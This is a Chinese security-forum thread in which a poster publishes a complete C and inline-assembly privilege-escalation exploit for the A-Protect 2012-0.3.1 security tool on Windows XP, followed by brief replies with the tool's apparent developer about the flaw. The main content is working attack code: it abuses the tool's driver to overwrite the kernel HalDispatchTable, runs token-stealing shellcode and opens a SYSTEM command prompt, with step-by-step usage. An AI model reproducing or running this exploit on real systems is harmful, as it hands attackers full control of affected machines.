首页
社区
课程
招聘
问答 CTF 排行榜 知识库 工具下载 峰会 看雪商城 证书查询
  1. 社区
  2. 编程技术
    3. 发新帖
[原创]A盾电脑防护 LE 2012-0.3.1 的一个XXX (还是本地提权)
发表于: 2012-6-19 15:56 5697

[原创]A盾电脑防护 LE 2012-0.3.1 的一个XXX (还是本地提权)

KiDebug 活跃值
4
2012-6-19 15:56
5697
环境:Windows XP SP3 虚拟机

1.打开A-Protect.exe
2.等待A-Protect.exe显示完系统进程信息
3.编译如下代码,双击运行后结束A-Protect.exe,然后得到一个SYSTEM的CMD

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
#include <Windows.h>
 
typedef struct _RTL_PROCESS_MODULE_INFORMATION {
    HANDLE Section;                 // Not filled in
    PVOID MappedBase;
    PVOID ImageBase;
    ULONG ImageSize;
    ULONG Flags;
    USHORT LoadOrderIndex;
    USHORT InitOrderIndex;
    USHORT LoadCount;
    USHORT OffsetToFileName;
    UCHAR  FullPathName[ 256 ];
} RTL_PROCESS_MODULE_INFORMATION, *PRTL_PROCESS_MODULE_INFORMATION;
 
typedef struct _RTL_PROCESS_MODULES {
    ULONG NumberOfModules;
    RTL_PROCESS_MODULE_INFORMATION Modules[ 1 ];
} RTL_PROCESS_MODULES, *PRTL_PROCESS_MODULES;
 
typedef ULONG ( __stdcall *NtQueryIntervalProfile_ ) ( ULONG, PULONG );
typedef ULONG ( __stdcall *NtQuerySystemInformation_ ) ( ULONG, PVOID, ULONG, PULONG );
typedef ULONG ( __stdcall *NtAllocateVirtualMemory_ ) ( HANDLE, PVOID, ULONG, PULONG, ULONG, ULONG );
NtQueryIntervalProfile_  NtQueryIntervalProfile;
NtAllocateVirtualMemory_ NtAllocateVirtualMemory;
NtQuerySystemInformation_ NtQuerySystemInformation;
 
ULONG  WriteToHalDispatchTable, ZwOpenProcess, ZwOpenProcessTokenEx, ZwDuplicateToken, ZwSetInformationProcess;
ULONG  SYSTEMCID[2]={4,0}, ObjectAttributes[6];
HANDLE  hSystemProc, hTokenHandle, hNewTokenHandle;
 
void _declspec(naked) ShellCode()
{
    __asm
    {
            pushad
            pushfd
 
            push offset SYSTEMCID
            push offset ObjectAttributes
            push 0x0400
            push offset hSystemProc
            call ZwOpenProcess
            cmp eax,0
            jnz exit0
 
            push offset hTokenHandle
            push 0x200
            push TOKEN_ALL_ACCESS
            push hSystemProc;
            call ZwOpenProcessTokenEx
            cmp eax,0
            jnz exit0
 
            push offset hNewTokenHandle
            push TokenPrimary
            push 0
            push 0
            push TOKEN_ALL_ACCESS
            push hTokenHandle
            call ZwDuplicateToken
            cmp eax,0
            jnz exit0
 
            push 8
            push offset hNewTokenHandle
            push 9
            push 0xFFFFFFFF
            call ZwSetInformationProcess
exit0:
            popfd
            popad
 
            ret
    }
}
 
#define AProcess_Size 0x683800
WCHAR   pSelfEXEPath[MAX_PATH];
UCHAR   pBuffer[AProcess_Size];
char    pSafe[] = "Safe";
 
int WINAPI WinMain( HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow )
{
 
    HMODULE ntdll;
    ntdll   =   GetModuleHandle( L"ntdll.dll" );
 
    if (  _stricmp(GetCommandLineA(),"Son") == 0 )
    {
        HMODULE  ntdll        =  GetModuleHandle( L"ntdll.dll" );
        NtQueryIntervalProfile    =  (NtQueryIntervalProfile_)GetProcAddress( ntdll ,"NtQueryIntervalProfile" );
        NtAllocateVirtualMemory    =  (NtAllocateVirtualMemory_)GetProcAddress( ntdll ,"NtAllocateVirtualMemory" );
        NtQuerySystemInformation  =  ( NtQuerySystemInformation_ )GetProcAddress( ntdll ,"NtQuerySystemInformation" );
        if ( NtQueryIntervalProfile == NULL || NtAllocateVirtualMemory == NULL || NtQuerySystemInformation == NULL )
            return 0;
 
        //取ntoskrnl的信息,只要调用一次就行
        ULONG  status, NtoskrnlBase;
        RTL_PROCESS_MODULES  module;
        status = NtQuerySystemInformation( 11, &module, sizeof(RTL_PROCESS_MODULES), NULL);//SystemModuleInformation 11
        if ( status != 0xC0000004 )    //STATUS_INFO_LENGTH_MISMATCH
            return 0;
 
        NtoskrnlBase     =  (ULONG)module.Modules[0].ImageBase;
 
        //把ntoskrnl.exe加载进来
        HMODULE    ntoskrnl;
        ntoskrnl    =    LoadLibraryA( (LPCSTR)( module.Modules[0].FullPathName + module.Modules[0].OffsetToFileName ) );
        if ( ntoskrnl == NULL )
            return 0;
 
        //计算实际地址
        WriteToHalDispatchTable    =  (ULONG)GetProcAddress(ntoskrnl,"HalDispatchTable") - (ULONG)ntoskrnl + NtoskrnlBase + 4; //需要覆盖的地址
        ZwOpenProcess        =  (ULONG)GetProcAddress(ntoskrnl,"ZwOpenProcess") - (ULONG)ntoskrnl + NtoskrnlBase;
        ZwOpenProcessTokenEx    =  (ULONG)GetProcAddress(ntoskrnl,"ZwOpenProcessTokenEx") - (ULONG)ntoskrnl + NtoskrnlBase;
        ZwDuplicateToken      =  (ULONG)GetProcAddress(ntoskrnl,"ZwDuplicateToken") - (ULONG)ntoskrnl + NtoskrnlBase;
        ZwSetInformationProcess    =  (ULONG)GetProcAddress(ntoskrnl,"ZwSetInformationProcess") - (ULONG)ntoskrnl + NtoskrnlBase;
 
        //以下代码就各显神通了
        ReadFile((HANDLE)0x18881111,pSafe,8,NULL,NULL);
 
        LPVOID MyAddress = VirtualAlloc(NULL,0x1000,MEM_COMMIT | MEM_RESERVE | MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE);
        if (MyAddress==NULL)
            return 0;
        memset(MyAddress,0,0x1000);
 
        ULONG Length[7]={0};
        Length[0]=-1;
        Length[6]=(ULONG)MyAddress;
        Length[7]=WriteToHalDispatchTable;
        ReadFile((HANDLE)0x18881191,0,(ULONG)Length,NULL,NULL);
 
        memcpy( MyAddress, ShellCode, 200 );
 
        //触发,弹出SYSTEM的CMD
        NtQueryIntervalProfile( 2, &status );
 
        STARTUPINFO si;
        PROCESS_INFORMATION pii;
 
        ZeroMemory( &si, sizeof(si) );
        si.cb = sizeof(si);
        ZeroMemory( &pii, sizeof(pii) );
 
        CreateProcess( L"C:\\windows\\system32\\cmd.exe", NULL, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pii );
    }
    else
    {
        HWND hWnd;
 
        hWnd = FindWindow(NULL,L"A盾电脑防护 LE 2012-0.3.1");
        if ( hWnd == NULL )
            return 0;
        PostMessage(hWnd,WM_CLOSE,0,0);
 
        for ( int i = 0; i < 10; i++ )
        {
            Sleep(1000);
 
            hWnd = FindWindow(NULL,L"A盾电脑防护");
            if ( hWnd != NULL )
            {
                PostMessage(hWnd,WM_KEYDOWN,VK_RETURN,0);
                break;
            }
        }
 
        GetModuleFileName(NULL,pSelfEXEPath,MAX_PATH);
 
        HANDLE hSelfFile = CreateFile(pSelfEXEPath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
        if ( hSelfFile == INVALID_HANDLE_VALUE )
            return 0;
 
        ULONG uFileSize = GetFileSize(hSelfFile,NULL);
        if ( uFileSize == INVALID_FILE_SIZE )
            return 0;
 
        ULONG dwResult;
        if ( ReadFile(hSelfFile,pBuffer,uFileSize,&dwResult,NULL) == 0 )
            return 0;
 
        HANDLE hTargetFile = CreateFile( L"C:\\1.exe", GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
        if (hTargetFile == INVALID_HANDLE_VALUE)
            return 0;
 
        if(!WriteFile (hTargetFile, pBuffer, AProcess_Size, &dwResult, NULL))
            return 0;
 
        CloseHandle(hSelfFile);
 
        CloseHandle(hTargetFile);
 
 
        STARTUPINFO si;
        PROCESS_INFORMATION pii;
 
        ZeroMemory( &si, sizeof(si) );
        si.cb = sizeof(si);
        ZeroMemory( &pii, sizeof(pii) );
 
        CreateProcess( L"C:\\1.exe", L"Son", NULL, NULL, FALSE, 0, NULL, NULL, &si, &pii );
    }
    return 0;
}


不玩了,学习A盾开源的代码去了。

[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

收藏
免费
支持
分享
最新回复 (4)
Winker
雪    币: 796
活跃值: (370)
能力值: ( LV9,RANK:380 )
在线值:
发帖
回帖
粉丝
私信
2
哈哈,我就知道你会用这招:

HANDLE hSelfFile = CreateFile(pSelfEXEPath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if ( hSelfFile == INVALID_HANDLE_VALUE )
      return 0;

    ULONG uFileSize = GetFileSize(hSelfFile,NULL);
    if ( uFileSize == INVALID_FILE_SIZE )
      return 0;

    ULONG dwResult;
    if ( ReadFile(hSelfFile,pBuffer,uFileSize,&dwResult,NULL) == 0 )
      return 0;

    HANDLE hTargetFile = CreateFile( L"C:\\1.exe", GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hTargetFile == INVALID_HANDLE_VALUE)
      return 0;

    if(!WriteFile (hTargetFile, pBuffer, AProcess_Size, &dwResult, NULL))
      return 0;

看来我这样做限制还是不行~~看来要验证MD5才行了。
2012-6-19 19:42
0
Winker
雪    币: 796
活跃值: (370)
能力值: ( LV9,RANK:380 )
在线值:
发帖
回帖
粉丝
私信
3
话说这样应该不是严格意义上的本地提权吧,因为只要A盾还在运行着,是不会产生这个bug~
2012-6-19 19:52
0
KiDebug
雪    币: 544
活跃值: (264)
能力值: ( LV12,RANK:210 )
在线值:
发帖
回帖
粉丝
私信
4
呃。。乱用提权字眼了。

验MD5也不管用啊

以后修改的代码还会继续开源么?
2012-6-19 20:12
0
Winker
雪    币: 796
活跃值: (370)
能力值: ( LV9,RANK:380 )
在线值:
发帖
回帖
粉丝
私信
5
  看情况了。如果觉得发布的意义大于留在硬盘的意义,就发布。
2012-6-20 09:17
0
游客
登录 | 注册 方可回帖
回帖 表情 雪币赚取及消费
高级回复
返回

账号登录
验证码登录

忘记密码?
没有账号?立即免费注册
我已同意 《看雪服务条款》 《看雪课程免责声明》 《看雪隐私政策》